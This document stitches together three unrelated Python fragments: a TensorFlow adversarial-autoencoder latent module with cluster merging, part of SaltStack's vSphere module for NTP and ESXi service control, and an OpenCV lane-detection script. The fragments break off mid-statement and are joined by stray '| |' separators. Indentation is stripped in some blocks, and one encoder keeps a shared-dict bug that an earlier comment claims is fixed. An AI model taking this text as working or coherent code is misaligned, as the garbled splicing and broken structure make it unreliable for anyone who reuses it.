            self, x: tf.Tensor, training_flag: tf.Tensor,
            scope: str = "encoder"
    ) -> tf.Tensor:
        """Build the encoder MLP mapping ``x`` to the Gaussian latent.

        Returns the latent tensor ``self.gau`` of shape
        ``(batch, latent_dim)``.
        """
        self.build_latent_scope = f"{scope}/{self.scope_safe_name}"
        with tf.variable_scope(self.build_latent_scope):
            # BUGFIX: the original used ``[dict(...)] * self.depth``, which
            # replicates ONE shared dict object; mutating element 0 below
            # then silently froze every layer instead of just the first.
            # Build independent dicts so only the first layer is frozen.
            dense_kwargs = [dict(
                deviation_regularizer=self.deviation_regularizer
            ) for _ in range(self.depth)]
            if dense_kwargs:  # Fix (freeze) the first layer when fine-tuning
                dense_kwargs[0]["weights_trainable"] = not self.fine_tune
            ptr = nn.mlp(
                x, [self.h_dim] * self.depth,
                dropout=self.dropout, batch_normalization=True,
                dense_kwargs=dense_kwargs, training_flag=training_flag
            )
            self.gau = tf.identity(nn.dense(
                ptr, self.latent_dim,
                deviation_regularizer=self.deviation_regularizer
            ), name="gau")
        # Remember the variables created under this scope for checkpointing.
        self.vars_to_save += tf.get_collection(
            tf.GraphKeys.GLOBAL_VARIABLES, self.build_latent_scope)
        return self.gau

    def _build_regularizer(
            self, training_flag: tf.Tensor, epoch: tf.Tensor,
            scope: str = "discriminator"
    ) -> tf.Tensor:
        """Build the adversarial regularizer towards a standard normal prior.

        Returns the weighted generator loss; the discriminator loss is
        minimized separately by the step created in ``_compile``.
        """
        self.gaup_sampler = tf.distributions.Normal(loc=0.0, scale=1.0)
        self.build_regularizer_scope = f"{scope}/{self.scope_safe_name}"
        with tf.variable_scope(self.build_regularizer_scope, reuse=tf.AUTO_REUSE):
            # Prior sample with the same batch size as the latent.
            self.gaup = self.gaup_sampler.sample((
                tf.shape(self.gau)[0], self.latent_dim))
            dropout = np.zeros(self.depth)
            dropout[1:] = self.dropout  # No dropout for first layer
            gau_pred = tf.sigmoid(nn.dense(nn.mlp(
                self.gau, [self.h_dim] * self.depth,
                dropout=dropout.tolist(), training_flag=training_flag
            ), 1), name="pred")
            gaup_pred = tf.sigmoid(nn.dense(nn.mlp(
                self.gaup, [self.h_dim] * self.depth,
                dropout=dropout.tolist(), training_flag=training_flag
            ), 1), name="prior_pred")
            self.gau_d_loss, self.gau_g_loss = nn.gan_loss(gaup_pred, gau_pred)
        self.vars_to_save += tf.get_collection(
            tf.GraphKeys.GLOBAL_VARIABLES, self.build_regularizer_scope)
        tf.add_to_collection(tf.GraphKeys.LOSSES, self.gau_d_loss)
        tf.add_to_collection(tf.GraphKeys.LOSSES, self.gau_g_loss)
        return self.lambda_reg * self.gau_g_loss

    def _compile(self, optimizer: str, lr: float) -> None:
        """Create the discriminator training step and register it as an
        update op so it runs alongside the main optimization step."""
        with tf.variable_scope(f"optimize/{self.scope_safe_name}"):
            optimizer = getattr(tf.train, optimizer)
            self.step = optimizer(lr).minimize(
                self.lambda_reg * self.gau_d_loss,
                var_list=tf.get_collection(
                    tf.GraphKeys.TRAINABLE_VARIABLES,
                    self.build_regularizer_scope
                )
            )
        tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, self.step)
class CatGau(Latent):
r"""
Build a double latent module, with a continuous Gaussian latent variable
and a one-hot categorical latent variable for intrinsic clustering of
the data. These two latent variabels are then combined into a single
cell embedding vector.
Parameters
----------
latent_dim
Dimensionality of the Gaussian latent variable.
cat_dim
Number of intrinsic clusters.
h_dim
Dimensionality of the hidden layers in the encoder MLP.
depth
Number of hidden layers in the encoder MLP.
dropout
Dropout rate.
multiclass_adversarial
Whether to use multi-class adversarial regularization on the
Gaussian latent variable.
Setting this to True makes each intrinsic cluster more Gaussian-like.
cat_merge
Whether to enable heuristic cluster merging during training.
min_silhouette
Minimal average silhouette score below which intrinsic clusters will be
merged.
patience
Execute heuristic cluster merging under a "fast-ring" early stop
mechanism, with early stop patience specified by this argument.
lambda_reg
Regularization strength on the latent variables.
name
Name of the module.
"""
def __init__(
self, latent_dim: int, cat_dim: int,
h_dim: int = 128, depth: int = 1, dropout: float = 0.0,
multiclass_adversarial: bool = False, cat_merge: bool = False,
min_silhouette: float = 0.0, patience: int = 10,
lambda_reg: float = 0.001, fine_tune: bool = False,
deviation_reg: float = 0.0, name="CatGau"
) -> None:
super(CatGau, self).__init__(latent_dim, h_dim, depth, dropout,
lambda_reg, fine_tune, deviation_reg, name)
self.cat_dim = cat_dim
self.multiclass_adversarial = multiclass_adversarial
self.min_silhouette = min_silhouette
self.patience = patience
self.cat_merge = cat_merge
if cat_merge:
self.on_epoch_end.append(self._cat_merge)
def _build_latent(
self, x: tf.Tensor, training_flag: tf.Tensor,
scope: str = "encoder"
) -> tf.Tensor:
self.build_latent_scope = f"{scope}/{self.scope_safe_name}"
with tf.variable_scope(self.build_latent_scope):
dense_kwargs = [dict(
deviation_regularizer=self.deviation_regularizer
)] * self.depth
if dense_kwargs: # Fix the first layer
dense_kwargs[0]["weights_trainable"] = not self.fine_tune
ptr = nn.mlp(
x, [self.h_dim] * self.depth,
dropout=self.dropout, batch_normalization=True,
dense_kwargs=dense_kwargs,
training_flag=training_flag
)
with tf.variable_scope("cat"):
self.cat_logit = tf.identity(nn.dense(
ptr, self.cat_dim,
deviation_regularizer=self.deviation_regularizer
), name="cat_logit")
self.cat = tf.nn.softmax(self.cat_logit, name="cat")
with tf.variable_scope("gau"):
self.gau = tf.identity(nn.dense(
ptr, self.latent_dim,
deviation_regularizer=self.deviation_regularizer
), name="gau")
self.latent = self.gau + nn.dense(
self.cat, self.latent_dim, use_bias=False,
weights_initializer=tf.random_normal_initializer(stddev=0.1),
deviation_regularizer=self.deviation_regularizer,
scope="cluster_head"
)
self.vars_to_save += tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, self.build_latent_scope)
return self.latent
    def _build_regularizer(
            self, training_flag: tf.Tensor, epoch: tf.Tensor,
            scope: str = "discriminator"
    ) -> tf.Tensor:
        """Set up the latent priors and dispatch to the binary or
        multi-class adversarial regularizer.

        ``catp_mask`` marks which intrinsic clusters are still active (the
        cluster-merging heuristic zeroes entries of merged clusters); the
        categorical prior samples proportionally to the mask.
        """
        self.catp_mask = tf.get_variable(
            "catp_mask", initializer=np.ones(self.cat_dim), trainable=False)
        self.vars_to_save.append(self.catp_mask)
        self.catp_sampler = tf.distributions.Categorical(
            probs=self.catp_mask / tf.reduce_sum(self.catp_mask))
        self.gaup_sampler = tf.distributions.Normal(loc=0.0, scale=1.0)
        if self.multiclass_adversarial:
            return self._build_multiclass_regularizer(training_flag, scope)
        return self._build_binary_regularizer(training_flag, scope)
    def _build_binary_regularizer(
            self, training_flag: tf.Tensor, scope: str = "discriminator"
    ) -> tf.Tensor:
        """Adversarially regularize ``cat`` and ``gau`` with two binary
        (sample-vs-prior) discriminators, one per latent variable.

        Returns the weighted sum of the two generator losses; the
        discriminator losses are minimized by the step built in ``_compile``.
        """
        self.build_regularizer_scope = f"{scope}/{self.scope_safe_name}"
        with tf.variable_scope(self.build_regularizer_scope, reuse=tf.AUTO_REUSE):
            with tf.variable_scope("cat"):
                # One-hot sample from the (masked) categorical prior,
                # matching the encoder batch size.
                self.catp = tf.one_hot(
                    self.catp_sampler.sample(tf.shape(self.cat)[0]),
                    depth=self.cat_dim
                )
                dropout = np.zeros(self.depth)
                dropout[1:] = self.dropout  # No dropout for first layer
                cat_pred = tf.sigmoid(nn.dense(nn.mlp(
                    self.cat, [self.h_dim] * self.depth,
                    dropout=dropout.tolist(), training_flag=training_flag
                ), 1), name="pred")
                catp_pred = tf.sigmoid(nn.dense(nn.mlp(
                    self.catp, [self.h_dim] * self.depth,
                    dropout=dropout.tolist(), training_flag=training_flag
                ), 1), name="prior_pred")
                self.cat_d_loss, self.cat_g_loss = \
                    nn.gan_loss(catp_pred, cat_pred)
            with tf.variable_scope("gau"):
                # Standard-normal prior sample matching the batch size.
                self.gaup = self.gaup_sampler.sample((
                    tf.shape(self.gau)[0], self.latent_dim))
                dropout = np.zeros(self.depth)
                dropout[1:] = self.dropout  # No dropout for first layer
                gau_pred = tf.sigmoid(nn.dense(nn.mlp(
                    self.gau, [self.h_dim] * self.depth,
                    dropout=dropout.tolist(), training_flag=training_flag
                ), 1), name="pred")
                gaup_pred = tf.sigmoid(nn.dense(nn.mlp(
                    self.gaup, [self.h_dim] * self.depth,
                    dropout=dropout.tolist(), training_flag=training_flag
                ), 1), name="prior_pred")
                self.gau_d_loss, self.gau_g_loss = \
                    nn.gan_loss(gaup_pred, gau_pred)
        # Track discriminator variables and expose losses for summaries.
        self.vars_to_save += tf.get_collection(
            tf.GraphKeys.GLOBAL_VARIABLES, self.build_regularizer_scope)
        tf.add_to_collection(tf.GraphKeys.LOSSES, self.cat_d_loss)
        tf.add_to_collection(tf.GraphKeys.LOSSES, self.cat_g_loss)
        tf.add_to_collection(tf.GraphKeys.LOSSES, self.gau_d_loss)
        tf.add_to_collection(tf.GraphKeys.LOSSES, self.gau_g_loss)
        return self.lambda_reg * (self.cat_g_loss + self.gau_g_loss)
    def _build_multiclass_regularizer(
            self, training_flag: tf.Tensor, scope: str = "discriminator"
    ) -> tf.Tensor:
        """Adversarial regularizer with a binary discriminator for ``cat``
        and a (cat_dim + 1)-way discriminator for ``gau``.

        The multi-class discriminator classifies latent samples into their
        soft cluster assignment (classes 0..cat_dim-1) versus the prior
        (extra class cat_dim), which pushes each intrinsic cluster towards
        the Gaussian prior individually.
        """
        self.build_regularizer_scope = f"{scope}/{self.scope_safe_name}"
        with tf.variable_scope(self.build_regularizer_scope, reuse=tf.AUTO_REUSE):
            with tf.variable_scope("cat"):
                # One-hot sample from the (masked) categorical prior.
                self.catp = tf.one_hot(
                    self.catp_sampler.sample(tf.shape(self.cat)[0]),
                    depth=self.cat_dim
                )
                dropout = np.zeros(self.depth)
                dropout[1:] = self.dropout  # No dropout for first layer
                cat_pred = tf.sigmoid(nn.dense(nn.mlp(
                    self.cat, [self.h_dim] * self.depth,
                    dropout=dropout.tolist(), training_flag=training_flag
                ), 1), name="pred")
                catp_pred = tf.sigmoid(nn.dense(nn.mlp(
                    self.catp, [self.h_dim] * self.depth,
                    dropout=dropout.tolist(), training_flag=training_flag
                ), 1), name="prior_pred")
                self.cat_d_loss, self.cat_g_loss = \
                    nn.gan_loss(catp_pred, cat_pred)
            with tf.variable_scope("gau"):
                self.gaup = self.gaup_sampler.sample((
                    tf.shape(self.gau)[0], self.latent_dim))
                dropout = np.zeros(self.depth)
                dropout[1:] = self.dropout  # No dropout for first layer
                gau_logits = nn.dense(nn.mlp(
                    self.gau, [self.h_dim] * self.depth,
                    dropout=dropout.tolist(), training_flag=training_flag
                ), self.cat_dim + 1)
                gaup_logits = nn.dense(nn.mlp(
                    self.gaup, [self.h_dim] * self.depth,
                    dropout=dropout.tolist(), training_flag=training_flag
                ), self.cat_dim + 1)
                # Targets: encoder samples carry their soft cluster
                # assignment; prior samples get the extra "prior" class.
                true = tf.concat([
                    tf.concat([
                        self.cat,
                        tf.zeros((tf.shape(self.cat)[0], 1))
                    ], axis=1),
                    tf.concat([
                        tf.zeros((tf.shape(gaup_logits)[0], self.cat_dim)),
                        tf.ones((tf.shape(gaup_logits)[0], 1))
                    ], axis=1)
                ], axis=0)
                logits = tf.concat([gau_logits, gaup_logits], axis=0)
                self.gau_d_loss = tf.reduce_mean(
                    tf.nn.softmax_cross_entropy_with_logits_v2(
                        labels=tf.stop_gradient(true), logits=logits,
                    ), name="d_loss"
                )
                # Generator plays the exact opposite of the discriminator.
                self.gau_g_loss = tf.negative(self.gau_d_loss, name="g_loss")
        self.vars_to_save += tf.get_collection(
            tf.GraphKeys.GLOBAL_VARIABLES, self.build_regularizer_scope)
        tf.add_to_collection(tf.GraphKeys.LOSSES, self.cat_d_loss)
        tf.add_to_collection(tf.GraphKeys.LOSSES, self.cat_g_loss)
        tf.add_to_collection(tf.GraphKeys.LOSSES, self.gau_d_loss)
        tf.add_to_collection(tf.GraphKeys.LOSSES, self.gau_g_loss)
        return self.lambda_reg * (self.cat_g_loss + self.gau_g_loss)
    def _compile(self, optimizer: str, lr: float) -> None:
        """Create the discriminator training step (minimizing both
        discriminator losses over the discriminator variables only) and
        register it as an update op so it runs with the main step."""
        with tf.variable_scope(f"optimize/{self.scope_safe_name}"):
            # `optimizer` is the name of a tf.train optimizer class.
            optimizer = getattr(tf.train, optimizer)
            self.step = optimizer(lr).minimize(
                self.lambda_reg * (self.cat_d_loss + self.gau_d_loss),
                var_list=tf.get_collection(
                    tf.GraphKeys.TRAINABLE_VARIABLES,
                    self.build_regularizer_scope
                )
            )
        tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, self.step)
# On epoch end heuristic
def _cat_merge(
self, model: "directi.DIRECTi",
train_data_dict: utils.DataDict,
val_data_dict: utils.DataDict, # pylint: disable=unused-argument
loss: tf.Tensor
) -> bool:
# Initialization
if "_cat_merge_dict" not in dir(self):
self._cat_merge_dict = {
"record": np.inf,
"countdown": self.patience,
"converged": False
}
d = self._cat_merge_dict
# Guard operatability
if model.sess.run(self.catp_mask).sum() == 1:
d["converged"] = True
return d["converged"]
# Guard entrance
if loss < d["record"]:
d["record"] = loss
d["countdown"] = self.patience
else:
d["countdown"] -= 1
# Entrance
if d["countdown"] == 0:
removed_clusters = set(np.where(
model.sess.run(self.catp_mask) == 0
)[0])
# Identify cluster heads that are not assigned any samples
cluster = model._fetch(
self.cat, train_data_dict
).argmax(axis=1).astype(np.int)
population = np.eye(self.cat_dim)[cluster, :].sum(axis=0)
remove_idx = set(np.where(
population <= 1
)[0]).difference(removed_clusters)
reason = "emptyness"
# Identify clusters that are not clearly separated
if not remove_idx:
latent = model._fetch(self.latent, train_data_dict)
if train_data_dict.size > 10000:
subsample_idx = model.random_state.choice(
train_data_dict.size, 10000, | |
'*' vsphere.ntp_configure my.vcenter.location root bad-password '[192.168.3.11, 172.16.17.32]' \
host_names='[esxi-1.host.com, esxi-2.host.com]'
'''
service_instance = salt.utils.vmware.get_service_instance(host=host,
username=username,
password=password,
protocol=protocol,
port=port)
if not isinstance(ntp_servers, list):
raise CommandExecutionError('\'ntp_servers\' must be a list.')
# Get NTP Config Object from ntp_servers
ntp_config = vim.HostNtpConfig(server=ntp_servers)
# Get DateTimeConfig object from ntp_config
date_config = vim.HostDateTimeConfig(ntpConfig=ntp_config)
host_names = _check_hosts(service_instance, host, host_names)
ret = {}
for host_name in host_names:
host_ref = _get_host_ref(service_instance, host, host_name=host_name)
date_time_manager = _get_date_time_mgr(host_ref)
log.debug('Configuring NTP Servers \'{0}\' for host \'{1}\'.'.format(ntp_servers, host_name))
try:
date_time_manager.UpdateDateTimeConfig(config=date_config)
except vim.fault.HostConfigFault as err:
msg = 'vsphere.ntp_configure_servers failed: {0}'.format(err)
log.debug(msg)
ret.update({host_name: {'Error': msg}})
continue
ret.update({host_name: {'NTP Servers': ntp_config}})
return ret
@depends(HAS_PYVMOMI)
@ignores_kwargs('credstore')
def service_start(host,
                  username,
                  password,
                  service_name,
                  protocol=None,
                  port=None,
                  host_names=None):
    '''
    Start the named service for the given host or list of hosts.

    host
        The location of the host.

    username
        The username used to login to the host, such as ``root``.

    password
        The password used to login to the host.

    service_name
        The name of the service for which to set the policy. Supported service names are:
          - DCUI
          - TSM
          - SSH
          - lbtd
          - lsassd
          - lwiod
          - netlogond
          - ntpd
          - sfcbd-watchdog
          - snmpd
          - vprobed
          - vpxa
          - xorg

    protocol
        Optionally set to alternate protocol if the host is not using the default
        protocol. Default protocol is ``https``.

    port
        Optionally set to alternate port if the host is not using the default
        port. Default port is ``443``.

    host_names
        List of ESXi host names. When the host, username, and password credentials
        are provided for a vCenter Server, the host_names argument is required to tell
        vCenter the hosts for which to start the service.

        If host_names is not provided, the service will be started for the ``host``
        location instead. This is useful for when service instance connection information
        is used for a single ESXi host.

    CLI Example:

    .. code-block:: bash

        # Used for single ESXi host connection information
        salt '*' vsphere.service_start my.esxi.host root bad-password 'ssh'

        # Used for connecting to a vCenter Server
        salt '*' vsphere.service_start my.vcenter.location root bad-password 'ssh' \
        host_names='[esxi-1.host.com, esxi-2.host.com]'
    '''
    service_instance = salt.utils.vmware.get_service_instance(host=host,
                                                              username=username,
                                                              password=password,
                                                              protocol=protocol,
                                                              port=port)
    host_names = _check_hosts(service_instance, host, host_names)
    valid_services = ['DCUI', 'TSM', 'SSH', 'ssh', 'lbtd', 'lsassd', 'lwiod', 'netlogond',
                      'ntpd', 'sfcbd-watchdog', 'snmpd', 'vprobed', 'vpxa', 'xorg']
    ret = {}

    # Don't require users to know that VMware lists the ssh service as TSM-SSH
    if service_name == 'SSH' or service_name == 'ssh':
        temp_service_name = 'TSM-SSH'
    else:
        temp_service_name = service_name

    # The service name does not depend on the host, so validate it once up
    # front instead of re-checking it on every loop iteration. The original
    # return shape is preserved: the error is keyed by the first host name.
    if host_names and service_name not in valid_services:
        ret.update({host_names[0]: {'Error': '{0} is not a valid service name.'.format(service_name)}})
        return ret

    for host_name in host_names:
        host_ref = _get_host_ref(service_instance, host, host_name=host_name)
        service_manager = _get_service_manager(host_ref)
        log.debug('Starting the \'{0}\' service on {1}.'.format(service_name, host_name))

        # Start the service
        try:
            service_manager.StartService(id=temp_service_name)
        except vim.fault.HostConfigFault as err:
            msg = '\'vsphere.service_start\' failed for host {0}: {1}'.format(host_name, err)
            log.debug(msg)
            ret.update({host_name: {'Error': msg}})
            continue
        # Some services are restricted by the vSphere License Level.
        except vim.fault.RestrictedVersion as err:
            log.debug(err)
            ret.update({host_name: {'Error': err}})
            continue

        ret.update({host_name: {'Service Started': True}})

    return ret
@depends(HAS_PYVMOMI)
@ignores_kwargs('credstore')
def service_stop(host,
                 username,
                 password,
                 service_name,
                 protocol=None,
                 port=None,
                 host_names=None):
    '''
    Stop the named service for the given host or list of hosts.

    host
        The location of the host.

    username
        The username used to login to the host, such as ``root``.

    password
        The password used to login to the host.

    service_name
        The name of the service for which to set the policy. Supported service names are:
          - DCUI
          - TSM
          - SSH
          - lbtd
          - lsassd
          - lwiod
          - netlogond
          - ntpd
          - sfcbd-watchdog
          - snmpd
          - vprobed
          - vpxa
          - xorg

    protocol
        Optionally set to alternate protocol if the host is not using the default
        protocol. Default protocol is ``https``.

    port
        Optionally set to alternate port if the host is not using the default
        port. Default port is ``443``.

    host_names
        List of ESXi host names. When the host, username, and password credentials
        are provided for a vCenter Server, the host_names argument is required to tell
        vCenter the hosts for which to stop the service.

        If host_names is not provided, the service will be stopped for the ``host``
        location instead. This is useful for when service instance connection information
        is used for a single ESXi host.

    CLI Example:

    .. code-block:: bash

        # Used for single ESXi host connection information
        salt '*' vsphere.service_stop my.esxi.host root bad-password 'ssh'

        # Used for connecting to a vCenter Server
        salt '*' vsphere.service_stop my.vcenter.location root bad-password 'ssh' \
        host_names='[esxi-1.host.com, esxi-2.host.com]'
    '''
    service_instance = salt.utils.vmware.get_service_instance(host=host,
                                                              username=username,
                                                              password=password,
                                                              protocol=protocol,
                                                              port=port)
    host_names = _check_hosts(service_instance, host, host_names)
    valid_services = ['DCUI', 'TSM', 'SSH', 'ssh', 'lbtd', 'lsassd', 'lwiod', 'netlogond',
                      'ntpd', 'sfcbd-watchdog', 'snmpd', 'vprobed', 'vpxa', 'xorg']
    ret = {}

    # Don't require users to know that VMware lists the ssh service as TSM-SSH
    if service_name == 'SSH' or service_name == 'ssh':
        temp_service_name = 'TSM-SSH'
    else:
        temp_service_name = service_name

    # The service name does not depend on the host, so validate it once up
    # front instead of re-checking it on every loop iteration. The original
    # return shape is preserved: the error is keyed by the first host name.
    if host_names and service_name not in valid_services:
        ret.update({host_names[0]: {'Error': '{0} is not a valid service name.'.format(service_name)}})
        return ret

    for host_name in host_names:
        host_ref = _get_host_ref(service_instance, host, host_name=host_name)
        service_manager = _get_service_manager(host_ref)
        log.debug('Stopping the \'{0}\' service on {1}.'.format(service_name, host_name))

        # Stop the service.
        try:
            service_manager.StopService(id=temp_service_name)
        except vim.fault.HostConfigFault as err:
            msg = '\'vsphere.service_stop\' failed for host {0}: {1}'.format(host_name, err)
            log.debug(msg)
            ret.update({host_name: {'Error': msg}})
            continue
        # Some services are restricted by the vSphere License Level.
        except vim.fault.RestrictedVersion as err:
            log.debug(err)
            ret.update({host_name: {'Error': err}})
            continue

        ret.update({host_name: {'Service Stopped': True}})

    return ret
@depends(HAS_PYVMOMI)
@ignores_kwargs('credstore')
def service_restart(host,
username,
password,
service_name,
protocol=None,
port=None,
host_names=None):
'''
Restart the named service for the given host or list of hosts.
host
The location of the host.
username
The username used to login to the host, such as ``root``.
password
The password used to login to the host.
service_name
The name of the service for which to set the policy. Supported service names are:
- DCUI
- TSM
- SSH
- lbtd
- lsassd
- lwiod
- netlogond
- ntpd
- sfcbd-watchdog
- snmpd
- vprobed
- vpxa
- xorg
protocol
Optionally set to alternate protocol if the host is not using the default
protocol. Default protocol is ``https``.
port
Optionally set to alternate port if the host is not using the default
port. Default port is ``443``.
host_names
List of ESXi host names. When the host, username, and password credentials
are provided for a vCenter Server, the host_names argument is required to tell
vCenter the hosts for which to restart the service.
If host_names is not provided, the service will be restarted for the ``host``
location instead. This is useful for when service instance connection information
is used for a single ESXi host.
CLI Example:
.. code-block:: bash
# Used for single ESXi host connection information
salt '*' vsphere.service_restart my.esxi.host root bad-password '<PASSWORD>'
# Used for connecting to a vCenter Server
salt '*' vsphere.service_restart my.vcenter.location root bad-password '<PASSWORD>' \
host_names='[esxi-1.host.com, esxi-2.host.com]'
'''
service_instance = salt.utils.vmware.get_service_instance(host=host,
username=username,
password=password,
protocol=protocol,
port=port)
host_names = _check_hosts(service_instance, host, host_names)
valid_services = ['DCUI', 'TSM', 'SSH', 'ssh', 'lbtd', 'lsassd', 'lwiod', 'netlogond',
'ntpd', 'sfcbd-watchdog', 'snmpd', 'vprobed', 'vpxa', 'xorg']
ret = {}
# Don't require users to know that VMware lists the ssh service as TSM-SSH
if service_name == 'SSH' or service_name == 'ssh':
temp_service_name = 'TSM-SSH'
else:
temp_service_name = service_name
for host_name in host_names:
# Check if the service_name provided is a valid one.
# If we don't have a valid service, return. The service will be invalid for all hosts.
if service_name not in valid_services:
ret.update({host_name: {'Error': '{0} is not a valid service name.'.format(service_name)}})
return ret
host_ref = _get_host_ref(service_instance, host, host_name=host_name)
service_manager = _get_service_manager(host_ref)
log.debug('Restarting the \'{0}\' service on {1}.'.format(service_name, host_name))
# Restart the service.
try:
service_manager.RestartService(id=temp_service_name)
except vim.fault.HostConfigFault as err:
msg = '\'vsphere.service_restart\' failed for host {0}: {1}'.format(host_name, err)
log.debug(msg)
ret.update({host_name: {'Error': msg}})
continue
# Some services are restricted | |
from moviepy.editor import VideoFileClip
from camera_calibration import camera_calibration
import cv2
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from pipeline import pipeline
# Camera intrinsics / distortion coefficients from chessboard calibration.
ret, mtx, dist, rvecs, tvecs = camera_calibration()

# Bird's-eye perspective transforms estimated from two straight-lane test
# images. The `src` quadrilaterals appear to be hand-picked lane-line points
# (bottom corners + points near y=492) -- TODO confirm against the images.
# straight_lines1.jpg
src = np.float32([[209, 719], [1095, 719], [538, 492], [751, 492]])
dst = np.float32([[209, 719], [1095, 719], [209, 0], [1095, 0]])
M1 = cv2.getPerspectiveTransform(src, dst)
Minv1 = cv2.getPerspectiveTransform(dst, src)
# print(M1)
# straight_lines2.jpg
src = np.float32([[228, 719], [1109, 719], [537, 492], [757, 492]])
dst = np.float32([[228, 719], [1109, 719], [228, 0], [1109, 0]])
M2 = cv2.getPerspectiveTransform(src, dst)
Minv2 = cv2.getPerspectiveTransform(dst, src)
# print(M2)
# NOTE(review): element-wise averaging of two homographies is not a true
# homography interpolation -- presumably acceptable here because the two
# estimates are nearly identical; verify on warped test images.
M = (M1 + M2) / 2
Minv = (Minv1 + Minv2) / 2
print(M)
def process_image(img):
img = cv2.undistort(img, mtx, dist, None, mtx)
threshed = pipeline(img)
height, width, channels = img.shape
binary_warped = cv2.warpPerspective(threshed, M, (width, height), flags=cv2.INTER_LINEAR)
# Assuming you have created a warped binary image called "binary_warped"
# Take a histogram of the bottom half of the image
histogram = np.sum(binary_warped[binary_warped.shape[0] // 2:, :], axis=0)
# Create an output image to draw on and visualize the result
out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255
# Find the peak of the left and right halves of the histogram
# These will be the starting point for the left and right lines
midpoint = np.int(histogram.shape[0] // 2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:]) + midpoint
# Choose the number of sliding windows
nwindows = 9
# Set height of windows
window_height = np.int(binary_warped.shape[0] // nwindows)
# Identify the x and y positions of all nonzero pixels in the image
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
# Current positions to be updated for each window
leftx_current = leftx_base
rightx_current = rightx_base
# Set the width of the windows +/- margin
margin = 100
# Set minimum number of pixels found to recenter window
minpix = 50
# Create empty lists to receive left and right lane pixel indices
left_lane_inds = []
right_lane_inds = []
# Step through the windows one by one
for window in range(nwindows):
# Identify window boundaries in x and y (and right and left)
win_y_low = binary_warped.shape[0] - (window + 1) * window_height
win_y_high = binary_warped.shape[0] - window * window_height
win_xleft_low = leftx_current - margin
win_xleft_high = leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
# Draw the windows on the visualization image
cv2.rectangle(out_img, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high),
(0, 255, 0), 2)
cv2.rectangle(out_img, (win_xright_low, win_y_low), (win_xright_high, win_y_high),
(0, 255, 0), 2)
# Identify the nonzero pixels in x and y within the window
good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &
(nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &
(nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0]
# Append these indices to the lists
left_lane_inds.append(good_left_inds)
right_lane_inds.append(good_right_inds)
# If you found > minpix pixels, recenter next window on their mean position
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
# Concatenate the arrays of indices
left_lane_inds = np.concatenate(left_lane_inds)
right_lane_inds = np.concatenate(right_lane_inds)
# Extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
# Fit a second order polynomial to each
left_fit = np.polyfit(lefty, leftx, 2)
right_fit = np.polyfit(righty, rightx, 2)
# Generate x and y values for plotting
ploty = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])
left_fitx = left_fit[0] * ploty ** 2 + left_fit[1] * ploty + left_fit[2]
right_fitx = right_fit[0] * ploty ** 2 + right_fit[1] * ploty + right_fit[2]
out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]
out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]
#plt.imshow(out_img)
#plt.plot(left_fitx, ploty, color='yellow')
#plt.plot(right_fitx, ploty, color='yellow')
#plt.xlim(0, 1280)
#plt.ylim(720, 0)
# Assume you now have a new warped binary image
# from the next frame of video (also called "binary_warped")
# It's now much easier to find line pixels!
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
margin = 100
left_lane_inds = ((nonzerox > (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy +
left_fit[2] - margin)) & (nonzerox < (left_fit[0] * (nonzeroy ** 2) +
left_fit[1] * nonzeroy + left_fit[
2] + margin)))
right_lane_inds = ((nonzerox > (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy +
right_fit[2] - margin)) & (nonzerox < (right_fit[0] * (nonzeroy ** 2) +
right_fit[1] * nonzeroy + right_fit[
2] + margin)))
# Again, extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
# Fit a second order polynomial to each
left_fit = np.polyfit(lefty, leftx, 2)
right_fit = np.polyfit(righty, rightx, 2)
# Generate x and y values for plotting
ploty = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])
left_fitx = left_fit[0] * ploty ** 2 + left_fit[1] * ploty + left_fit[2]
right_fitx = right_fit[0] * ploty ** 2 + right_fit[1] * ploty + right_fit[2]
# Create an image to draw on and an image to show the selection window
out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255
window_img = np.zeros_like(out_img)
# Color in left and right line pixels
out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]
out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]
# Generate a polygon to illustrate the search window area
# And recast the x and y points into usable format for cv2.fillPoly()
left_line_window1 = np.array([np.transpose(np.vstack([left_fitx - margin, ploty]))])
left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx + margin,
ploty])))])
left_line_pts = np.hstack((left_line_window1, left_line_window2))
right_line_window1 = np.array([np.transpose(np.vstack([right_fitx - margin, ploty]))])
right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx + margin,
ploty])))])
right_line_pts = np.hstack((right_line_window1, right_line_window2))
# Draw the lane onto the warped blank image
cv2.fillPoly(window_img, np.int_([left_line_pts]), (0, 255, 0))
cv2.fillPoly(window_img, np.int_([right_line_pts]), (0, 255, 0))
